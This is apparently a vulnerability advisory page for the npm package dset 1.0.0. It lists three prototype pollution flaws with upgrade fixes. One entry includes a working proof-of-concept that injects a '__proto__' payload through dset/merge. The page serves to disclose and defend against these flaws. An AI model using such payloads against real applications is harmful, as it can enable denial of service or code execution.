dset@1.0.0 vulnerabilities

A tiny (194B) utility for safely writing deep Object values~!

  • latest version

    3.1.4

  • latest non vulnerable version

  • first published

    6 years ago

  • latest version published

    3 months ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the dset package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    dset is an A tiny (161B) utility for safely writing deep Object values~!

    Affected versions of this package are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property __proto__, which is recursively assigned to all the objects in the program.

    How to fix Prototype Pollution?

    Upgrade dset to version 3.1.4 or higher.

    <3.1.4
    • M
    Prototype Pollution

    dset is an A tiny (161B) utility for safely writing deep Object values~!

    Affected versions of this package are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution.

    PoC:

    // poc.js contains:
    
    const {dset} = require("dset/merge")
    
    var a = {b:{c:1}}
    
    console.log("a.polluted:",a.polluted)
    console.log("{}.polluted:",({}).polluted)
    
    dset(a,"b", JSON.parse('{"__proto__":{"polluted":"Yes!"}}') ) //Needs to craft payload with JSON.parse to keep the object key __proto__
    
    console.log("a.polluted:",a.polluted)
    console.log("{}.polluted:",({}).polluted)
    
    // Running node poc.js give the output:
    
    a.polluted: undefined
    {}.polluted: undefined
    a.polluted: Yes!
    {}.polluted: Yes!
    

    How to fix Prototype Pollution?

    Upgrade dset to version 3.1.2 or higher.

    <3.1.2
    • H
    Prototype Pollution

    dset is an A tiny (161B) utility for safely writing deep Object values~!

    Affected versions of this package are vulnerable to Prototype Pollution. It allows an attacker to cause a denial of service and may lead to remote code execution.

    How to fix Prototype Pollution?

    Upgrade dset to version 2.1.0 or higher.

    >=1.0.0 <2.1.0